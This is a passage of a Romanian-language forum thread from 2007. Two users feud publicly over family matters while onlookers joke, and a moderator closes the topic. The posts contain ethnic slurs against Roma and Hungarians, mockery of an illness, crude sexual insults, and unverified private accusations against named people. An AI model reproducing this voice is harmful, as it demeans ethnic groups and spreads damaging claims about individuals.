IN REST SINCER E TREABA MEA CE FAC.TE OFTICI CA TE-AM DEPISTAT SI PE TINE SI TIGANII TAI DIN PIATRA. CREDEATI CA TREMUR DE FRICA? VA INSELATI AMAR. IAR PTR CULTURA TA CA NU ESTI MAMA SI NICI NU AI CUM SA FII DIN CAUZA CANCERULUI PE CARE-L AI ( sincer ...regret), POT SA-TI SPUN CA NOAPTEA COPILASII DORM IAR DE DIMINEATAEUAITREZESC CU ZECI DE PUPICI SI MASAJ, DUPA CARE SUNT LA DISPOZITIA LOR PANA VINE SOTUL MEU IUBIT SI PREIA COMANDA DE LA MINE, IAR EU DORM CATEVA ORE SI MERG DIN NOU LA OFFICE CA SA RAD DE TINE PE FORUM....Vai de lumea voastra...sobolanilor !

24.06.2007, 01:23
Oau ce munca buna,unde ai prins la office noaptea?

Nu stiam ca ingrijirea de persoane varstnice se face la office!

Sa-mi dai si mie adresa ca un pare un loc bun de munca...

Cat despre sotul tau iubit Gheorghe mai bine l-ai numi GREEN CARD..!

24.06.2007, 01:27
Stati linistiti am ras si eu destul. Mai trebuie sa si muncesc ;altfel scapa toti fara amenda.Ce e drept de cateva zile incoace am fost in dulgenta cu cei care au incalcat legea, asta ptr ca m-am simtit bine...si am spus sa nu le mai trimit vitezomanilor poza acasa si la politie...Lasa sa-i prinda colegii mei...smileys/smiley4.gif

Si-am incalecat pe -o sea si v-am spus povestea asa....Tatiana, Arizona.smileys/smiley32.gif

PS: FUFO 111Hai ca te oftici !!!!!smileys/smiley7.gifsmileys/smiley7.gifsmileys/smiley7.gif

divo
24.06.2007, 01:27
Alooo.... Decat sa-l inchideti, mai bine mutati topicul asta in sectiunea umor. Nu-sh' cum se face, insa, in ciuda faptelor, de cand tot citesc balacareala asta, asa ma-ncearca un nebun de ras, de n-am vorbe sa v-o spui !...smileys/smiley4.gif

Mariane..aduci tu semintele?smileys/smiley36.gifsmileys/smiley36.gif

24.06.2007, 01:29
Alooo.... Decat sa-l inchideti, mai bine mutati topicul asta in sectiunea umor. Nu-sh' cum se face, insa, in ciuda faptelor, de cand tot citesc balacareala asta, asa ma-ncearca un nebun de ras, de n-am vorbe sa v-o spui !...smileys/smiley4.gif

Mariane..aduci tu semintele?smileys/smiley36.gifsmileys/smiley36.gif Auzi divo am eu seminte si albe si negre....HA ! HA! HA ! Serios, dar trebuie sa vii in Arizona....

24.06.2007, 01:31
In ceea ce priveste statutul de mama eu sunt mama,si nu mi-am abandonat niciodata copii de asta copii au fost mereu cu mine...

Spre diferenta de tine care ai abandonat copillul si ai fugit si te-ai intors dupa 7 ani cerand drepturi de mama.

Daca fostul sot iti fura copilul in timp ce era langa tine,era de condamnat,dar tu erai prea ocupata pentru viitorul tau in America in loc sa vii acasa sa o iei.Dupa cum a declarat Ion ,iti dadea copilul daca erai acasa insa ai fost prea ocupata sa faci bigamie si Green Card.

24.06.2007, 01:33
"FRUNZULITA FRAGA, SPUNE MANDRO DRAGA,

N-ASCULTA DE LUME,

LUMEA MULTE SPUNE...."

....Asa-mi canta sotul meu iubit mereu si ma pupa, si ma stringe si ma...unge pe suflet. Ca doar de....E ardelean 100% , om cu sufletul mare si inima buna....

24.06.2007, 01:34
Divo stai linistit ca semintele ei sunt stricate,iar daca intri pe mana ei fara un copil nu scapi.Gandeste-te de 2 ori!smileys/smiley36.gif

24.06.2007, 01:39
Ce romantic! In afara de cantecul asta frumos nu te intreaba si de EDDIE care ti-a spart usa cand stateai in Bacau la etajul 4? Stii tu fostul amant cu care ai avut procese si l-ai bagat la inchisoare?

Apropo tu Tatiana ca intre femei,cum a scapat fara un copil,ca sa ai 3 barbati? Curios lucru,te stiu fata vrednica....smileys/smiley2.gif

24.06.2007, 01:41
Dupa cum ti-am spus cultura ta generala lasa de dorit, in primul rand.

In al doilea rand, Anisoara si Lucica siau parasit alcolistii care-i aveau de o viata, si ele sunt acum " in probe " la doi mosnegi Italieni , de mai bine de 5 ani si tot nu le-au facut actele, copii lor ramanand in Romania la cealalta" bozgorita", Tereza.Asa ca....referitor la drepturile de mama eu nu le-am cerut de la nimeni ptr ca le-am avut din totdeauna. Eu am nascut copii deci sunt mama lor...Tatiii....(smileys/smiley2.gif)

marian42
24.06.2007, 01:42

Neica, aci nu e loc de seminte, ca le sfarsim repede !

Luam grataru, sfaraim pa el niscaiva mici, o fleica, doua,
bashca oareshce bucati de ceafa, bagam la rece o lada de bere, ca-i
rost de priveala indelungata si circ pe saturatelea. smileys/smiley4.gifsmileys/smiley4.gifsmileys/smiley4.gif

Hai, lelitzelor, ziceti-i, tzatzicilor, bagati d-alea cu
strigaturi, ca de nu v-oti lua si la palme, o sa cerem banii
'napoi !!! smileys/smiley4.gifsmileys/smiley4.gifsmileys/smiley4.gif

24.06.2007, 01:43
Nu-mi spune nimic numele acesta, si nici ce-mi relatezi tu acolo !

SORYYYYYYYYYYYYYYYYY ! Mai departe .

24.06.2007, 01:46

Neica, aci nu e loc de seminte, ca le sfarsim repede !
Luam grataru, sfaraim pa el niscaiva mici, o fleica, doua, bashca oareshce bucati de ceafa, bagam la rece o lada de bere, ca-i rost de priveala indelungata si circ pe saturatelea. smileys/smiley4.gifsmileys/smiley4.gifsmileys/smiley4.gif
Hai, lelitzelor, ziceti-i, tzatzicilor, bagati d-alea cu strigaturi, ca de nu v-oti lua si la palme, o sa cerem banii 'napoi !!! smileys/smiley4.gifsmileys/smiley4.gifsmileys/smiley4.gif

Ha ! Ha ! Ha !. De mici mi-e pofta si mie niciodata nu mi-au iesit ! Stii nu am stiut cum trebuie sa-i frec in mana .Poate stie " CUMNATA " E EXPERTA LA LONDRA....hA ! hA ! HA !

angeline
24.06.2007, 01:46
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif...mariane</span> pe mine nu ma lua cu berea ca-i amara !
eu vreau Ottonel Muscatt</span>smileys/smiley2.gifsmileys/smiley36.gifsmileys/smiley36.gif imi place demi-sec si semi-dulcesmileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

24.06.2007, 01:50
Nu iti aduce aminte?Stai rau cu memoria,sau nu vrei sa iti amintesti?iti trimit numarul de dosar,sau o sunam pe mama lui la TBC \Bacau unde lucreaza,ea sigur isi aduce aminte daca tu l-ai uitat...ca si acum te blesteama ca fiul ei Eddie si-a pierdut servicul de maistru in armata? Ai distrus cam multe vieti,nu mai face pe cinstita si nu mai vorbi de Dumnezeu ca te traznesti din senin!smileys/smiley1.gif

divo
24.06.2007, 01:53
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif...mariane pe mine nu ma lua cu berea ca-i amara !
eu vreau Ottonel Muscattsmileys/smiley2.gifsmileys/smiley36.gifsmileys/smiley36.gif imi place demi-sec si semi-dulcesmileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

ps (nu reprezint nici un post de radio sau televiziune !)smileys/smiley2.gif

Angeline..pe caldura asta..berea e numa' buna!Da' ce ne facem daca ni se termina tigarile"smileys/smiley36.gif?Cine merge sa cumpere..si sa piarda vreun episod?smileys/smiley36.gif

marian42
24.06.2007, 01:58
Ha ! Ha ! Ha !. De mici mi-e pofta si mie niciodata nu mi-au iesit ! Stii nu am stiut cum trebuie sa-i frec in mana .

Cocoana, tu lasa-ma pe mine si vezi-ti de show-ul tau. Ca io n-am platit beletu' sa si joc in piesa asta ! smileys/smiley2.gifsmileys/smiley4.gifsmileys/smiley2.gif

24.06.2007, 01:59
Divo ai 2 alegeri:daca vin eu iti aduc tigari daca vine cumnata din California iti face un copil ,ce preferi?smileys/smiley36.gif

24.06.2007, 01:59
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif...mariane pe mine nu ma lua cu berea ca-i amara !
eu vreau Ottonel Muscattsmileys/smiley2.gifsmileys/smiley36.gifsmileys/smiley36.gif imi place demi-sec si semi-dulcesmileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

ps (nu reprezint nici un post de radio sau televiziune !)smileys/smiley2.gif

Angeline..pe caldura asta..berea e numa' buna!Da' ce ne facem daca ni se termina tigarile"smileys/smiley36.gif?Cine merge sa cumpere..si sa piarda vreun episod?smileys/smiley36.gif

Eu am alta propunere, sa veniti la mine la piscina ! Bere cat doriti, de toate felurile , vinuri romanesti si frantuzesti, BBQ, Muzica romaneasca si prieteni o sumedenie. Apa ete 30 de grade in piscina, deci berea e super...Cu tigarile stam prost, la noi nu se fumeaza, dar se admit exceptii. Afara sunt intre 36 - 40 grade.

angeline
24.06.2007, 02:02
divo</span>, cum bine se stie, orice problema are cel putin o solutie</span> ! smileys/smiley2.gif le rezolvam pe toate pe rand smileys/smiley36.gif
1</span> pana pe inserat eu beau suc de fructe
2 </span>ca si nefumatoare ma sacrific eu si dau fuga de va aduc pipele dorite smileys/smiley36.gif

ps</span> (nu reprezint nici un post de radio sau televiziune !)

marian42
24.06.2007, 02:02

Divo, ca doar tot oameni or fi si muherile astea doua, or
mai rasufla si ele, si-or mai trage sufletu, or mai bea o tzar'
de apa, ca sa priza glas, si-n farama aia de vreme, o da careva fuga
pana dupa colt, sa cumpere tutun pentru toata lumea. Ca de rabdare, nu
ducem lipsa....

24.06.2007, 02:04
Pentru marian42. Stai linistit, vrei nu vrei ai intrat in hora !Pacatul e acelasi chiar daca e " cu gandul , cu privirea sau cu fapta" ! Nu ai stiut ????? SO ???

si ce sa va spun aia zau ca e nebuna ! Cum sa va dau un copil nici daca MOR !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!

24.06.2007, 02:06
Nu va lasati pacaliti! Daca ati intrat in piscina va opareste!smileys/smiley36.gif

24.06.2007, 02:09
Auzi nu imi intoarce vorbele,am zis ca le faci copii ca te pricepi nu ca la dai! nu umbla din nou cu imbarligaturi ca nu tine...te dau afara din forumsmileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

24.06.2007, 02:12
smileys/smiley36.gifVEDETI FRATILOR....DACA RENUNTAM SA MAI INTRU PE FORUM CU CINE VA MAI DISTRATI VOI ACUM ? aM SPUS EU CRED CA AM BAUT PANA ACUM CAM 10 CAFELE, SI TOATA PANARAMA CU TIGANCA ASTA GRETOASA MA TINUT TREAZA. dIN NEFERICIRE TREBUIE SA VA ANUNT CA PESTE DOUA ORE DISPAR DE PE SCENA MERG LA PUISORII MEI IUBITI, SA-I PUPE MAMA IAR PA AL MAI MARE....INTELEGETI VOI CE-I FACsmileys/smiley2.gif !!!! hO ! hO ! hO !....smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

OSTATI CA MINT , AZI E DUMINICA SI MERGEM LA BISERICA DAR, CIND MA INTORC NICI O PROBLEMA.

ps; Oricum diseara lucrez si...CUCU - BAU !!!! VINE FETITA !

24.06.2007, 02:18
Si eu va las oameni buni,ca merg sa caut o munca de noapte....nu de altceva dar sunt implinita financiar,

dar o fac doar ca sa ma amuz....reven cu detalii picante....fiti pe faza! va promit ca am sa va amuz in continuare in episodul 2 ...

LA REVEDERE!DIVO ,MARIAN SI ANGELINE!

24.06.2007, 02:21
Apropo Tatiana fetita la 95 de kilograme si 41 de ani nu te poti numi tocmai o fetita!smileys/smiley36.gif

Si nu uita la biserica sa te rogi sa ti se ierte pacatele ca ai multe tare..Hai nu fi nervoasa acuma nu e frumos sa te duci la biserica cu sulfletul incarcatsmileys/smiley9.gif

angeline
24.06.2007, 02:24
OK Thanks !...mie una imi ajunge, pare un serial ieftin iar eu una nu sunt devoratoare de telenouvelle !smileys/smiley2.gif

ps </span> (nu reprezint nici un post de radio sau televiziune !)smileys/smiley2.gif
ps 1 divo</span>, mariane</span>, poate ne intalnim la o alta terasa sa devoram mici, bere, suc de fructe, vin, pop-corn, pipe si alte alea smileys/smiley2.gifsmileys/smiley36.gifsmileys/smiley36.gif

24.06.2007, 02:30
Caut o prietena...bla, bla, bla......smileys/smiley17.gif.cata dreptate am avut ! Fufo, zi ce vrei "ma lasa rece". Apropo: dacasunt implinita financiar pentru mine nu inseamna ca nu mai trebuie sa muncesc ! Cerebelul trebuie sa lucreze altfel...raman PLAFONATA CA TINE smileys/smiley7.gif! Si-apoi , unde nu-i cap, vai de picioare !smileys/smiley19.gif

La tine...e invers nu ai nevoie de cerebel doar trebuie sa stii sa-ti desfaci picioarele !!!!! smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

Ps; Subiectul tau e incheiat. Ai gasit prietena asa ca nu ma mai intereseaza topicul acesta. Sunt altele in care sincer vreau sa ma implic. smileys/smiley4.gifsmileys/smiley32.gif

fifi
24.06.2007, 02:37
...asa ca nu ma mai intereseaza topicul acesta. Sunt altele in care sincer vreau sa ma implic. smileys/smiley4.gifsmileys/smiley32.gif

aoleu, asta suna a amenintare, pana acum m-am rugat ca n-o sa-ti treaca asa ceva prin minte, mie deja mie-e frica smileys/smiley18.gif

24.06.2007, 02:39
...asa ca nu ma mai intereseaza topicul acesta. Sunt altele in care sincer vreau sa ma implic. smileys/smiley4.gifsmileys/smiley32.gif

aoleu, asta suna a amenintare, pana acum m-am rugat ca n-o sa-ti treaca asa ceva prin minte, mie deja mie-e frica smileys/smiley18.gif

sazi bland..fifi, nu am treaba cu tine !smileys/smiley36.gifsmileys/smiley2.gif

24.06.2007, 02:46
AOLEUUUUU ! AM UITAT : O INTREBARE PTR FUFA ( CUMNATICA ):

DACA ESTI TU...( ACELA DUTE INAPOI, SI-ADA O DAMIGEANA SO O BEM AMANDOI ).....SPUNE-MI CARE A FOST MELODIA CARE A FOST CANTATA DE PESTE 20 DE ORI LA NUNTA MEA CU RAPOSATUL ?

CINE A AVUT VOALUL MEU PUS PE CAP SI CINE MA....FU-RAT ??????

1,2,3,4,5,.CRED CA AI TIMPUL EXPIRAT. AI PIERDUT.

fifi
24.06.2007, 02:49
uff, mi-ai luat o piatra de pe inima, deci ma chemi la piscina? smileys/smiley4.gif

auzi supermamy da` am si io o curiozitate, de unde ai atatea computere sa te loghezi si sa-ti faci alte conturi, ca pana acum ti-au fost deja blocate vro 2 ip uri? smileys/smiley92.gif

ah si uitasem, o rugaminte la tine, daca se poate, poti sa scrii putin mai mare ca eu nu vad prea bine... daca se poate...

24.06.2007, 02:57
uff, mi-ai luat o piatra de pe inima, deci ma chemi la piscina? smileys/smiley4.gif

auzi supermamy da` am si io o curiozitate, de unde ai atatea computere sa te loghezi si sa-ti faci alte conturi, ca pana acum ti-au fost deja blocate vro 2 ip uri? smileys/smiley92.gif

ah si uitasem, o rugaminte la tine, daca se poate, poti sa scrii putin mai mare ca eu nu vad prea bine... daca se poate...

Puiut...dupa cum am spus la jobul meu pot sa-mi permit asta .sunt ...cine sunt, am pozitia...care o am , si...pot sa-mi permit. Daca as fi lucrat la ingrijit batranii cum spunea " cumnatica "mea, schimbam pemparsii...nu compiuterele !

ps; Zau ca poti veni la piscina. Pe bune ca nu pun eu la suflet niste mizerii de pe forum .Asta ptr mine esa treaca timpul si sa nu adorm cu capup pe tastatura...daca esti hotarat(a) Fam Barbu e foarte primitoare si prietenoasa.( se stie )

24.06.2007, 03:00
soryyy, dar ...eu nu vad prea bine, stau cate 12-14 ore cu ochii pe doua sau mai multe compiutere, asa ca ma dor si pe mine, e normal numai am...cinspe ani !

sorin
24.06.2007, 04:04
topic inchis la cererea initiatoarei. imi pare rau ca nu am putut-o face mai devreme, fara sa se adune atatea vorbe grele, dar de vina e fusul orar diferit smileys/smiley5.gif

nota: acest topic si-a castigat un meritat loc la "arhiva de perle", asa ca va fi mutat acolo smileys/smiley2.gif